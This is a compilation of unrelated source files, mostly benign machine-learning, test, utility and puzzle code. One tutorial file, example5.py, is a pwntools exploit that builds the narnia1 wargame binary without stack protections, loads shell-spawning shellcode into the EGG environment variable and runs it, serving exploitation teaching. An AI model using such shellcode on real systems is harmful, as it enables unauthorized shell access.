for root, dirnames, filenames in os.walk(path):
for filename in fnmatch.filter(filenames, '*.jpg'):
matches.append(os.path.join(root, filename))
# logging.debug('matches {}'.format(matches))
images_count = len(matches)
return images_count
nb_test_samples = get_images_count_recursive(dataset_test_path)
logging.debug('nb_test_samples {}'.format(nb_test_samples))
if not os.path.exists('output'):
os.makedirs('output')
if not os.path.exists('logs'):
os.makedirs('logs')
# TODO: HARDCODING - Should be same as used during training VGG; Else error (None, None, 512)
input_shape = (img_width, img_height, 3)
# Sorted subdirectories list
def get_subdir_list(path):
names=[]
for name in sorted(os.listdir(path)):
if os.path.isdir(os.path.join(path, name)):
names.append(name)
logging.debug('names {}'.format(names))
return names
class_names = get_subdir_list(dataset_train_path)
logging.debug('class_names {}'.format(class_names))
# build the VGG16 network
base_model = applications.VGG16(weights='imagenet', include_top=False, input_shape=input_shape)
logging.debug('Model loaded.')
logging.debug('{}'.format(base_model.output_shape)) # (None, None, None, 512) if input_shape not given in applications.VGG16
logging.debug('{}'.format(base_model.output_shape[1:])) # (None, None, 512)
### MODEL 1
# build a classifier model to put on top of the convolutional model
# top_model = Sequential()
# top_model.add(Flatten(input_shape=base_model.output_shape[1:]))
# top_model.add(Dense(256, activation='relu'))
# top_model.add(Dropout(0.5))
# top_model.add(Dense(len(class_names), activation='softmax')) # Binary to Multi classification changes
# #top_model.add(Dense(1, activation='sigmoid'))
# # note that it is necessary to start with a fully-trained
# # classifier, including the top classifier,
# # in order to successfully do fine-tuning
# # top_model.load_weights(top_model_weights_path)
# # add the model on top of the convolutional base
# # base_model.add(top_model) # Not working; AttributeError: 'Model' object has no attribute 'add'
# model = Model(inputs=base_model.input, outputs=top_model(base_model.output))
# logging.debug('{}'.format(model.summary()))
# model.compile(loss='sparse_categorical_crossentropy',
# optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),
# metrics=['accuracy'])
### MODEL2
inputs = Input(shape=(base_model.output_shape[1:]))
x_common = Dense(256, activation='relu')(inputs)
## Model Classification
x = Flatten()(x_common)
#x = Dropout(dropout_rate)(x)
predictions_class = Dense(len(class_names), activation='softmax', name='predictions_class')(x)
## Model (Regression) IOU score
x = Flatten()(x_common)
# x = Dense(256, activation='relu')(x)
# x = Dropout(dropout_rate)(x)
predictions_iou = Dense(1, activation='sigmoid', name='predictions_iou')(x)
# This creates a model that includes the Input layer and three Dense layers
#model = Model(inputs=inputs, outputs=[predictions_class(base_model.output), predictions_iou(base_model.output)])
model = Model(inputs=inputs, outputs=[predictions_class(base_model.output), predictions_iou])
logging.debug('model summary {}'.format(model.summary()))
model.compile(optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),
loss={'predictions_class': 'sparse_categorical_crossentropy', 'predictions_iou': 'mean_squared_error'},
metrics=['accuracy'])
model.load_weights(finetune_model_weights_path)
logging.debug('weights loaded: {}'.format(finetune_model_weights_path))
def evaluate_test_dataset():
## Test
test_datagen = ImageDataGenerator(rescale=1. / 255)
test_generator = test_datagen.flow_from_directory(
dataset_test_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='sparse', # Binary to Multi classification changes
save_to_dir=None,
shuffle=False)
scores = model.evaluate_generator(test_generator, nb_test_samples // batch_size)
logging.debug('model.metrics_names {}'.format(model.metrics_names))
logging.debug('scores {}'.format(scores))
def predict_image_dir():
# Predict
# TODO: Hardcoding
# Put all images in sample_images/test folder
dataset_predict_path='sample_images'
#dataset_predict_path='temp'
logging.debug('dataset_predict_path {}'.format(dataset_predict_path))
predict_datagen = ImageDataGenerator(rescale=1. / 255)
predict_generator = predict_datagen.flow_from_directory(
dataset_predict_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='sparse', # Binary to Multi classification changes
save_to_dir=None,
shuffle=False)
nb_predict_samples = get_images_count_recursive(dataset_predict_path)
logging.debug('nb_predict_samples {}'.format(nb_predict_samples))
prediction = model.predict_generator(predict_generator, nb_predict_samples // batch_size, verbose=1)
logging.debug('\n\nprediction \n{}'.format(prediction))
# Display predictions
matches=[]
for root, dirnames, filenames in os.walk(os.path.join(dataset_predict_path,'test')):
for filename in fnmatch.filter(filenames, '*.jpg'):
matches.append(os.path.join(root, filename))
for index,preds in enumerate(prediction):
logging.debug('\n{}'.format((matches[index])))
for index2, pred in enumerate(preds):
logging.debug('class_names {}'.format(class_names[index2]))
logging.debug('pred {0:6f}'.format(float(pred)))
def pad_and_crop_image(old_im, new_width, new_height):
# old_im = Image.open('someimage.jpg')
old_size = old_im.size
new_size = (new_width, new_height)
new_im = Image.new("RGB", new_size) # this is already black!
new_im.paste(old_im, ((new_size[0]-old_size[0])/2,
(new_size[1]-old_size[1])/2))
# new_im.show()
# new_im.save('someimage.jpg')
return new_im
def predict_image_name(image_path_name):
logging.debug('image_path_name {}'.format(image_path_name))
candidates = selective_search_bbox(image_path_name)
logging.debug('candidates {}'.format(candidates))
image_name = image_path_name.split('/')[-1].split('.')[0]
logging.debug('image_name {}'.format(image_name))
# img = Image.open(image_path_name)
# logging.debug('{} {} {}'.format(img.format, img.size, img.mode))
#img2 = img.crop((0, 0, 100, 100))
# img2.save("img2.jpg")
# img2.show()
#crop_img = img[200:400, 100:300] # Crop from x, y, w, h -> 100, 200, 300, 400
# NOTE: its img[y: y + h, x: x + w] and *not* img[x: x + w, y: y + h]
# img = cv2.imread(image_path_name)
# fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(6, 6))
img_read = Image.open(image_path_name)
logging.debug('{} {} {}'.format(img_read.format, img_read.size, img_read.mode))
# img_read.show()
i=0
for x, y, w, h in (candidates):
# left, upper, right, and lower pixel; The cropped section includes the left column and
# the upper row of pixels and goes up to (but doesn't include) the right column and bottom row of pixels
img_crop = img_read.crop((y, x, y+w, x+h))
img_crop.save('temp/test/'+ image_name + '_' + str(i) + '_cropped_' + '.jpg')
logging.debug('img_crop {} {} {}'.format(img_crop.format, img_crop.size, img_crop.mode))
img_crop_resize = img_crop.resize((img_width, img_height))
img_crop_resize.save('temp/test/'+ image_name + '_' + str(i) + '_cropped_resize' + '.jpg')
logging.debug('img_crop_resize {} {} {}'.format(img_crop_resize.format, img_crop_resize.size, img_crop_resize.mode))
i=i+1
# crop_img = img[x:y, w:h] # Crop from x, y, w, h -> 100, 200, 300, 400
# logging.debug('crop_img {}'.format(crop_img.shape))
# ax.imshow(crop_img)
# # cv2.imshow('cropped', crop_img)
# # cv2.waitKey(0)
# plt.show()
# # Convert Image to array
# img = PIL.Image.open("foo.jpg").convert("L")
# arr = numpy.array(img)
# # Convert array to Image
# img = PIL.Image.fromarray(arr)
# img = cv2.resize(cv2.imread(image_path_name), (224, 224)).astype(np.float32)
# img2.save('temp/test/img_'+str(i)+'.jpg')
# img3 = img2.thumbnail((img_width, img_height))
# logging.debug('img3 {}'.format(type(img3)))
# # img3.save('temp/test/img_'+str(i)+'_resized.jpg')
# logging.debug('{} {} {}'.format(img3.format, img3.size, img3.mode))
# img4 = pad_and_crop_image(img3, img_width, img_height)
# logging.debug('{} {} {}'.format(img4.format, img4.size, img4.mode))
# img4.save('temp/test/img_'+str(i)+'_resized1.jpg')
img=np.array(img_crop_resize).astype(np.float32)
img[:,:,0] -= 103.939
img[:,:,1] -= 116.779
img[:,:,2] -= 123.68
#img = img.transpose((2,0,1))
img = np.expand_dims(img, axis=0)
prediction = model.predict(img, batch_size, verbose=1)
logging.debug('\n\nprediction \n{}'.format(prediction))
for index,preds in enumerate(prediction):
for pred in preds:
logging.debug('pred {0:6f}'.format(float(pred)))
### MAIN ###
#evaluate_test_dataset()
#predict_image_dir()
# #image='dataset/test/Jeans/img_Distressed_Skinny_Jeans_img_00000004.jpg'
# #image='sample_images/test/img_Distressed_Denim_Jeans_img_00000001.jpg'
# image='sample_images/test/img_Acid_Wash_Denim_Romper_img_00000070.jpg'
image='sample_images/test/img_Acid_Wash_-_Skinny_Jeans_img_00000005.jpg'
#image='sample_images/test/img_Boxy_Faux_Fur_Jacket_img_00000001.jpg'
#image='sample_images/test/img_Athletic_Marled_Knit_Joggers_img_00000009.jpg'
predict_image_name(image)
|
tensorflow_graphics/rendering/tests/splat_with_opengl_test.py | sarvex/graphics | 2,759 | 12775993 | <filename>tensorflow_graphics/rendering/tests/splat_with_opengl_test.py<gh_stars>1000+
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for rasterize than splat functionality with opengl rasterization."""
from tensorflow_graphics.rendering import rasterization_backend
from tensorflow_graphics.rendering.tests import splat_test
from tensorflow_graphics.util import test_case
class SplatWithOpenGLTest(splat_test.SplatTest):
def setUp(self):
super().setUp()
    # This pattern was chosen instead of a parametrized test to facilitate
# running the test cases in pure CPU mode on machines that do not have a
# GPU. In this case the opengl rasterizer cannot be added as dependency to
# the binary as CPU only machines do not have the required libEGL.so
# available. This pattern provides a separate build target for the opengl
# rasterizer version.
self._backend = rasterization_backend.RasterizationBackends.OPENGL
if __name__ == '__main__':
test_case.main()
|
Python/neon_numbers.py | MjCode01/DS-Algo-Point | 1,148 | 12776001 | # Neon number --> If the sum of the digits of the squared number is equal to the original number, the number is said to be a Neon number. Example: 9
ch=int(input("Enter 1 to do it with loop and 2 without loop :\n"))
n= int(input("Enter the number :\n"))
def number(n):
sq= n**2
digisum=0
while sq>0:
r=sq%10
digisum = digisum + r
sq=sq//10
if (n==digisum):
print("The number is neon number")
else:
print("Not a neon mumber")
# Without Loop
def number2(n):
sq=n*n
r=sq%10
q=sq//10
tocheck=r+q
if n==tocheck:
print("It is a Neon Number")
else:
print("Not a neon number")
if ch==1:
number(n)
elif ch==2:
number2(n)
else:
print("Enter correct choice")
"""
Time complexity - O(1)
Space complexity - O(1)
I/o--
Enter 1 to do it with loop and 2 without loop :
2
Enter the number :
9
It is a Neon Number
Explanation
Input n: 9
sq=81
r=1
q=8
tocheck=8+1 =>9
Output
if 9 == 9 ==> Neon number
"""
|
src/python/nimbusml/linear_model/symsgdbinaryclassifier.py | michaelgsharp/NimbusML | 134 | 12776039 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
SymSgdBinaryClassifier
"""
__all__ = ["SymSgdBinaryClassifier"]
from sklearn.base import ClassifierMixin
from ..base_predictor import BasePredictor
from ..internal.core.linear_model.symsgdbinaryclassifier import \
SymSgdBinaryClassifier as core
from ..internal.utils.utils import trace
class SymSgdBinaryClassifier(
core,
BasePredictor,
ClassifierMixin):
"""
    Train a symbolic SGD model.
.. remarks::
Stochastic gradient descent (SGD) is a well known method for
regression and classification
tasks, and is primarily a sequential algorithm. The
``SymSgdBinaryClassifier`` is an
implementation of a parallel SGD algorithm that, to a first-order
approximation, retains the
sequential semantics of SGD. Each thread learns a local model as well
        as a `model combiner`
        which allows local models to be combined to produce what a
sequential model would have
produced.
**Reference**
`Parallel Stochastic Gradient Descent with Sound Combiners
<https://arxiv.org/pdf/1705.08030.pdf>`_
:param feature: see `Columns </nimbusml/concepts/columns>`_.
:param label: see `Columns </nimbusml/concepts/columns>`_.
:param normalize: Specifies the type of automatic normalization used:
* ``"Auto"``: if normalization is needed, it is performed
automatically. This is the default choice.
* ``"No"``: no normalization is performed.
* ``"Yes"``: normalization is performed.
* ``"Warn"``: if normalization is needed, a warning
message is displayed, but normalization is not performed.
Normalization rescales disparate data ranges to a standard scale.
Feature
        scaling ensures the distances between data points are proportional
and
enables various optimization methods such as gradient descent to
converge
much faster. If normalization is performed, a ``MaxMin`` normalizer
is
used. It normalizes values in an interval [a, b] where ``-1 <= a <=
0``
and ``0 <= b <= 1`` and ``b - a = 1``. This normalizer preserves
sparsity by mapping zero to zero.
:param caching: Whether trainer should cache input training data.
:param number_of_iterations: Number of passes over the data.
:param learning_rate: Determines the size of the step taken in the
direction of the gradient in each step of the learning process. This
determines how fast or slow the learner converges on the optimal
solution. If the step size is too big, you might overshoot the optimal
solution. If the step size is too small, training takes longer to
converge to the best solution.
:param l2_regularization: L2 regularization.
:param number_of_threads: Degree of lock-free parallelism. Determinism not
guaranteed. Multi-threading is not supported currently.
:param tolerance: Tolerance for difference in average loss in consecutive
passes.
:param update_frequency: The number of iterations each thread learns a
local model until combining it with the global model. Low value means
more updated global model and high value means less cache traffic.
:param memory_size: Memory size for L-BFGS. Lower=faster, less accurate.
The technique used for optimization here is L-BFGS, which uses only a
limited amount of memory to compute the next step direction. This
parameter indicates the number of past positions and gradients to store
for the computation of the next step. Must be greater than or equal to
``1``.
:param shuffle: Shuffle data?.
:param positive_instance_weight: Apply weight to the positive class, for
imbalanced data.
:param params: Additional arguments sent to compute engine.
.. seealso::
:py:class:`LogisticRegressionBinaryClassifier
<nimbusml.linear_model.LogisticRegressionBinaryClassifier>`,
:py:class:`SgdBinaryClassifier
<nimbusml.linear_model.SgdBinaryClassifier>`,
:py:class:`FastLinearBinaryClassifier
<nimbusml.linear_model.FastLinearBinaryClassifier>`
.. index:: models, parallel, SGD, symbolic
Example:
.. literalinclude:: /../nimbusml/examples/SymSgdBinaryClassifier.py
:language: python
"""
@trace
def __init__(
self,
normalize='Auto',
caching='Auto',
number_of_iterations=50,
learning_rate=None,
l2_regularization=0.0,
number_of_threads=None,
tolerance=0.0001,
update_frequency=None,
memory_size=1024,
shuffle=True,
positive_instance_weight=1.0,
feature=None,
label=None,
**params):
if 'feature_column_name' in params:
raise NameError(
"'feature_column_name' must be renamed to 'feature'")
if feature:
params['feature_column_name'] = feature
if 'label_column_name' in params:
raise NameError(
"'label_column_name' must be renamed to 'label'")
if label:
params['label_column_name'] = label
BasePredictor.__init__(self, type='classifier', **params)
core.__init__(
self,
normalize=normalize,
caching=caching,
number_of_iterations=number_of_iterations,
learning_rate=learning_rate,
l2_regularization=l2_regularization,
number_of_threads=number_of_threads,
tolerance=tolerance,
update_frequency=update_frequency,
memory_size=memory_size,
shuffle=shuffle,
positive_instance_weight=positive_instance_weight,
**params)
self.feature = feature
self.label = label
@trace
def predict_proba(self, X, **params):
'''
Returns probabilities
'''
return self._predict_proba(X, **params)
@trace
def decision_function(self, X, **params):
'''
Returns score values
'''
return self._decision_function(X, **params)
def get_params(self, deep=False):
"""
Get the parameters for this operator.
"""
return core.get_params(self)
|
homeassistant/components/derivative/__init__.py | domwillcode/home-assistant | 22,481 | 12776049 | """The derivative component."""
|
Codes/gracekoo/interview_8.py | ghoslation/algorithm | 256 | 12776092 | # -*- coding: utf-8 -*-
# @Time: 2020/7/16 11:38
# @Author: GraceKoo
# @File: interview_8.py
# @Desc: https://www.nowcoder.com/practice/8c82a5b80378478f9484d87d1c5f12a4?tpId=13&rp=1&ru=%2Fta%2Fcoding-interviews&qr
# u=%2Fta%2Fcoding-interviews%2Fquestion-ranking
class Solution:
def climbStairs(self, n: int) -> int:
if 0 <= n <= 2:
return n
dp = [i for i in range(n)]
dp[0] = 1
dp[1] = 2
for i in range(2, n):
dp[i] = dp[i - 1] + dp[i - 2]
return dp[-1]
so = Solution()
print(so.climbStairs(3))
|
tests/components/slack/__init__.py | tbarbette/core | 22,481 | 12776095 | <reponame>tbarbette/core
"""Slack notification tests."""
|
LeetCode/python3/47.py | ZintrulCre/LeetCode_Archiver | 279 | 12776107 | <reponame>ZintrulCre/LeetCode_Archiver<gh_stars>100-1000
class Solution:
def permuteUnique(self, nums: List[int]) -> List[List[int]]:
def BackTrack(m, per: list):
if m == n:
if per not in permutation:
permutation.append(per)
return per
for i in range(n):
if not visited[i]:
per.append(nums[i])
visited[i] = True
per = BackTrack(m + 1, per)
per = per[:-1]
visited[i] = False
return per
n = len(nums)
visited = [False for _ in range(n)]
per = []
permutation = []
BackTrack(0, [])
return list(set(tuple(k) for k in permutation))
|
Trakttv.bundle/Contents/Libraries/Shared/oem/media/show/__init__.py | disrupted/Trakttv.bundle | 1,346 | 12776127 | <reponame>disrupted/Trakttv.bundle
from oem.media.show.identifier import EpisodeIdentifier # NOQA
from oem.media.show.mapper import ShowMapper # NOQA
from oem.media.show.match import EpisodeMatch # NOQA
|
tests/fork/conftest.py | AqualisDAO/curve-dao-contracts | 217 | 12776163 | <gh_stars>100-1000
import pytest
from brownie_tokens import MintableForkToken
class _MintableTestToken(MintableForkToken):
def __init__(self, address):
super().__init__(address)
@pytest.fixture(scope="session")
def MintableTestToken():
yield _MintableTestToken
@pytest.fixture(scope="module")
def USDC():
yield _MintableTestToken("<KEY>")
@pytest.fixture(scope="module")
def ThreeCRV():
yield _MintableTestToken("0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490")
@pytest.fixture(scope="module")
def SUSD():
yield _MintableTestToken("0x57ab1ec28d129<PASSWORD>52df4df418<PASSWORD>a2d46d5f51")
@pytest.fixture(scope="module")
def SBTC():
yield _MintableTestToken("0xfE18be6b3Bd88A2D2A7f928d00292E7a9963CfC6")
|
bleurt/score_test.py | yongchanghao/bleurt | 416 | 12776167 | <reponame>yongchanghao/bleurt
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for scoring function."""
import os
from bleurt import score
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
references = [
"An apple a day keeps the doctor away.",
"An apple a day keeps the doctor away."
]
candidates = [
"An apple a day keeps the doctor away.",
"An apple a day keeps doctors away."
]
ref_scores = [0.910811, 0.771989]
def get_test_checkpoint():
pkg = os.path.abspath(__file__)
pkg, _ = os.path.split(pkg)
ckpt = os.path.join(pkg, "test_checkpoint")
assert tf.io.gfile.exists(ckpt)
return ckpt
class ScoreTest(tf.test.TestCase):
def test_default_bleurt_score(self):
bleurt = score.BleurtScorer()
scores = bleurt.score(references=references, candidates=candidates)
self.assertLen(scores, 2)
self.assertAllClose(scores, ref_scores)
def test_positional_args_error(self):
bleurt = score.BleurtScorer()
with self.assertRaises(AssertionError):
_ = bleurt.score(references, candidates)
def test_bleurt_nulls(self):
bleurt = score.BleurtScorer()
test_references = []
test_candidates = []
scores = bleurt.score(
references=test_references, candidates=test_candidates)
self.assertLen(scores, 0)
def test_bleurt_empty(self):
bleurt = score.BleurtScorer()
test_references = [""]
test_candidates = [""]
scores = bleurt.score(
references=test_references, candidates=test_candidates)
self.assertLen(scores, 1)
def test_bleurt_score_with_checkpoint(self):
checkpoint = get_test_checkpoint()
bleurt = score.BleurtScorer(checkpoint)
scores = bleurt.score(references=references, candidates=candidates)
self.assertLen(scores, 2)
self.assertAllClose(scores, ref_scores)
def test_tf_bleurt_score_eager(self):
# Creates the TF Graph.
bleurt_ops = score.create_bleurt_ops()
tfcandidates = tf.constant(candidates)
tfreferences = tf.constant(references)
bleurt_out = bleurt_ops(references=tfreferences, candidates=tfcandidates)
# Computes the BLEURT scores.
self.assertIn("predictions", bleurt_out)
self.assertEqual(bleurt_out["predictions"].shape, (2,))
self.assertAllClose(bleurt_out["predictions"], ref_scores)
def test_tf_bleurt_positional_args_error(self):
# Creates the TF Graph.
bleurt_ops = score.create_bleurt_ops()
tfcandidates = tf.constant(candidates)
tfreferences = tf.constant(references)
with self.assertRaises(AssertionError):
_ = bleurt_ops(tfreferences, tfcandidates)
if __name__ == "__main__":
tf.test.main()
|
alphamind/portfolio/meanvariancebuilder.py | rongliang-tech/alpha-mind | 186 | 12776189 | # -*- coding: utf-8 -*-
"""
Created on 2017-6-27
@author: cheng.li
"""
from typing import Dict
from typing import Optional
from typing import Tuple
from typing import Union
import numpy as np
from alphamind.portfolio.optimizers import (
QuadraticOptimizer,
TargetVolOptimizer
)
from alphamind.exceptions.exceptions import PortfolioBuilderException
def _create_bounds(lbound,
ubound,
bm,
risk_exposure,
risk_target):
if lbound is not None:
lbound = lbound - bm
if ubound is not None:
ubound = ubound - bm
if risk_exposure is not None:
cons_mat = risk_exposure.T
bm_risk = cons_mat @ bm
clbound = (risk_target[0] - bm_risk).reshape((-1, 1))
cubound = (risk_target[1] - bm_risk).reshape((-1, 1))
else:
cons_mat = None
clbound = None
cubound = None
return lbound, ubound, cons_mat, clbound, cubound
def _create_result(optimizer, bm):
if optimizer.status() == "optimal" or optimizer.status() == "optimal_inaccurate":
return optimizer.status(), optimizer.feval(), optimizer.x_value() + bm
else:
raise PortfolioBuilderException(optimizer.status())
def mean_variance_builder(er: np.ndarray,
risk_model: Dict[str, Union[None, np.ndarray]],
bm: np.ndarray,
lbound: Union[np.ndarray, float, None],
ubound: Union[np.ndarray, float, None],
risk_exposure: Optional[np.ndarray],
risk_target: Optional[Tuple[np.ndarray, np.ndarray]],
lam: float = 1.,
linear_solver: str = 'deprecated') -> Tuple[str, float, np.ndarray]:
lbound, ubound, cons_mat, clbound, cubound = _create_bounds(lbound, ubound, bm, risk_exposure,
risk_target)
if cons_mat is not None:
cons_matrix = np.concatenate([cons_mat, clbound, cubound], axis=1)
else:
cons_matrix = None
cov = risk_model['cov']
special_risk = risk_model['idsync']
risk_cov = risk_model['factor_cov']
risk_exposure = risk_model['factor_loading']
prob = QuadraticOptimizer(objective=-er,
cons_matrix=cons_matrix,
lbound=lbound,
ubound=ubound,
penalty=lam,
cov=cov,
factor_cov=risk_cov,
factor_load=risk_exposure,
factor_special=special_risk)
if prob.status() == "optimal" or prob.status() == 'optimal_inaccurate':
return prob.status(), prob.feval(), prob.x_value() + bm
else:
raise PortfolioBuilderException(prob.status())
def target_vol_builder(er: np.ndarray,
risk_model: Dict[str, Union[None, np.ndarray]],
bm: np.ndarray,
lbound: Union[np.ndarray, float],
ubound: Union[np.ndarray, float],
risk_exposure: Optional[np.ndarray],
risk_target: Optional[Tuple[np.ndarray, np.ndarray]],
vol_target: float = 1.,
linear_solver: str = 'ma27') -> Tuple[str, float, np.ndarray]:
lbound, ubound, cons_mat, clbound, cubound = _create_bounds(lbound, ubound, bm, risk_exposure,
risk_target)
if cons_mat is not None:
cons_matrix = np.concatenate([cons_mat, clbound, cubound], axis=1)
else:
cons_matrix = None
cov = risk_model['cov']
special_risk = risk_model['idsync']
risk_cov = risk_model['factor_cov']
risk_exposure = risk_model['factor_loading']
prob = TargetVolOptimizer(objective=-er,
cons_matrix=cons_matrix,
lbound=lbound,
ubound=ubound,
target_vol=vol_target,
factor_cov=risk_cov,
factor_load=risk_exposure,
factor_special=special_risk,
cov=cov)
if prob.status() == "optimal" or prob.status() == 'optimal_inaccurate':
return prob.status(), prob.feval(), prob.x_value() + bm
else:
raise PortfolioBuilderException(prob.status())
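if __name__ == "__main__":
    # Minimal sketch of the internal bounds helper (illustrative only): with no
    # risk-exposure constraints, the weight bounds are simply shifted by the benchmark.
    bm = np.array([0.5, 0.5])
    lb, ub, cons_mat, clb, cub = _create_bounds(np.zeros(2), np.ones(2), bm, None, None)
    print(lb, ub)  # [-0.5 -0.5] [0.5 0.5]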
|
code_sender/rstudio/__init__.py | fredcallaway/SendCode | 177 | 12776198 | import sublime
import os
from ..clipboard import clipboard
plat = sublime.platform()
if plat == "osx":
from ..applescript import osascript
RSTUDIOAPPLESCRIPT = os.path.join(os.path.dirname(__file__), "rstudio.applescript")
def send_to_rstudio(cmd):
osascript(RSTUDIOAPPLESCRIPT, cmd)
elif plat == "windows":
from .. import winauto
def send_to_rstudio(cmd, from_view):
rid = winauto.find_rstudio()
clipboard.set_clipboard(cmd)
winauto.paste_to_rstudio(rid, from_view=from_view)
clipboard.reset_clipboard()
elif plat == "linux":
from ..xdotool import xdotool
def send_to_rstudio(cmd):
wid = xdotool("search", "--onlyvisible", "--class", "rstudio")
if wid:
wid = wid.decode("utf-8").strip().split("\n")[-1]
clipboard.set_clipboard(cmd)
xdotool("key", "--window", wid, "ctrl+v")
xdotool("key", "--window", wid, "--clearmodifiers", "Return")
clipboard.reset_clipboard()
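# Illustrative call (platform-dependent): on macOS and Linux, plugin code invokes
# send_to_rstudio("head(mtcars)\n"); on Windows the originating view must also be
# passed, e.g. send_to_rstudio(cmd, from_view=view).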
|
2_writeups/3_robot_exploitation/tutorial7/example5.py | araujorayza/robot_hacking_manual | 141 | 12776236 | #!/usr/bin/env python
from pwn import *
import os
# Exploiting vulnerable code narnia1.c:
#
# #include <stdio.h>
#
# int main(){
# int (*ret)();
#
# if(getenv("EGG")==NULL){
# printf("Give me something to execute at the env-variable EGG\n");
# exit(1);
# }
#
# printf("Trying to execute EGG!\n");
# ret = getenv("EGG");
# ret();
#
# return 0;
# }
# Define the context of the working machine
context(arch='amd64', os='linux')
# Compile the binary
log.info("Compiling the binary narnia1_local")
os.system('gcc narnia1.c -g -o narnia1_local -fno-stack-protector -z execstack')
# os.system('gcc narnia1.c -g -m32 -o narnia1_local -fno-stack-protector -z execstack')
# Get a simple shellcode
log.info("Putting together simple shellcode")
shellcode = asm(shellcraft.amd64.sh(), arch='amd64')
# print(shellcode)
log.info("Introduce shellcode in EGG env. variable")
os.environ["EGG"] = shellcode
log.info("Launching narnia1_local")
sh = process('narnia1_local')
sh.interactive()
|
metaflow/plugins/aws/aws_utils.py | Netflix/metaflow | 5,821 | 12776238 | <gh_stars>1000+
import re
def get_docker_registry(image_uri):
"""
Explanation:
(.+?(?:[:.].+?)\/)? - [GROUP 0] REGISTRY
.+? - A registry must start with at least one character
(?:[:.].+?)\/ - A registry must have ":" or "." and end with "/"
? - Make a registry optional
(.*?) - [GROUP 1] REPOSITORY
.*? - Get repository name until separator
(?:[@:])? - SEPARATOR
?: - Don't capture separator
[@:] - The separator must be either "@" or ":"
? - The separator is optional
((?<=[@:]).*)? - [GROUP 2] TAG / DIGEST
            (?<=[@:]) - A tag / digest must be preceded by "@" or ":"
.* - Capture rest of tag / digest
? - A tag / digest is optional
Examples:
image
- None
- image
- None
example/image
- None
- example/image
- None
example/image:tag
- None
- example/image
- tag
example.domain.com/example/image:tag
- example.domain.com/
- example/image
- tag
192.168.127.12:123/example/image:tag
- 192.168.127.12:123/
- example/image
- tag
example.domain.com/example/image@sha256:45b23dee0
- example.domain.com/
- example/image
- sha256:45b23dee0
"""
pattern = re.compile(r"^(.+?(?:[:.].+?)\/)?(.*?)(?:[@:])?((?<=[@:]).*)?$")
registry, repository, tag = pattern.match(image_uri).groups()
if registry is not None:
registry = registry.rstrip("/")
    return registry
|
textx/scoping/__init__.py | stanislaw/textX | 346 | 12776240 | <reponame>stanislaw/textX
#######################################################################
# Name: scoping.__init__.py
# Purpose: Meta-model / scope providers.
# Author: <NAME>
# License: MIT License
#######################################################################
import glob
import os
import errno
from os.path import join, exists, abspath
def metamodel_for_file_or_default_metamodel(filename, the_metamodel):
from textx import metamodel_for_file
from textx.exceptions import TextXRegistrationError
try:
return metamodel_for_file(filename)
except TextXRegistrationError:
return the_metamodel
# -----------------------------------------------------------------------------
# Scope helper classes:
# -----------------------------------------------------------------------------
class Postponed(object):
"""
Return an object of this class to postpone a reference resolution.
If you get circular dependencies in resolution logic, an error
is raised.
"""
class ModelRepository(object):
"""
This class has the responsibility to hold a set of (model-identifiers,
model) pairs as dictionary.
    For some scope providers the model identifier is the absolute
    filename of the model.
"""
def __init__(self):
self.name_idx = 1
self.filename_to_model = {}
def has_model(self, filename):
return abspath(filename) in self.filename_to_model
def add_model(self, model):
if model._tx_filename:
filename = abspath(model._tx_filename)
else:
filename = 'builtin_model_{}'.format(self.name_idx)
self.name_idx += 1
self.filename_to_model[filename] = model
def remove_model(self, model):
filename = None
for f, m in self.filename_to_model.items():
if m == model:
filename = f
if filename:
# print("*** delete {}".format(filename))
del self.filename_to_model[filename]
def __contains__(self, filename):
return self.has_model(filename)
def __iter__(self):
return iter(self.filename_to_model.values())
def __len__(self):
return len(self.filename_to_model)
def __getitem__(self, filename):
return self.filename_to_model[filename]
def __setitem__(self, filename, model):
self.filename_to_model[filename] = model
class GlobalModelRepository(object):
"""
This class has the responsibility to hold two ModelRepository objects:
- one for model-local visible models
- one for all models (globally, starting from some root model).
    The second `ModelRepository`, `all_models`, caches already loaded models
    and prevents loading the same model twice.
The class allows loading local models visible to the current model. The
current model is the model which references this `GlobalModelRepository` as
attribute `_tx_model_repository`
When loading a new local model, the current `GlobalModelRepository`
forwards the embedded `ModelRepository` `all_models` to the new
`GlobalModelRepository` of the next model. This is done using the
`pre_ref_resolution_callback` to set the necessary information before
resolving the references in the new loaded model.
"""
def __init__(self, all_models=None):
"""
Create a new repo for a model.
Args:
all_models: models to be added to this new repository.
"""
self.local_models = ModelRepository() # used for current model
if all_models is not None:
self.all_models = all_models # used to reuse already loaded models
else:
self.all_models = ModelRepository()
def remove_model(self, model):
self.all_models.remove_model(model)
self.local_models.remove_model(model)
def remove_models(self, models):
for m in models:
self.remove_model(m)
def load_models_using_filepattern(
self, filename_pattern, model, glob_args, is_main_model=False,
encoding='utf-8', add_to_local_models=True, model_params=None):
"""
Add a new model to all relevant objects.
Args:
filename_pattern: models to be loaded
model: model holding the loaded models in its _tx_model_repository
field (may be None).
glob_args: arguments passed to the glob.glob function.
Returns:
the list of loaded models
"""
from textx import get_metamodel
if model is not None:
self.update_model_in_repo_based_on_filename(model)
the_metamodel = get_metamodel(model) # default metamodel
else:
the_metamodel = None
filenames = glob.glob(filename_pattern, **glob_args)
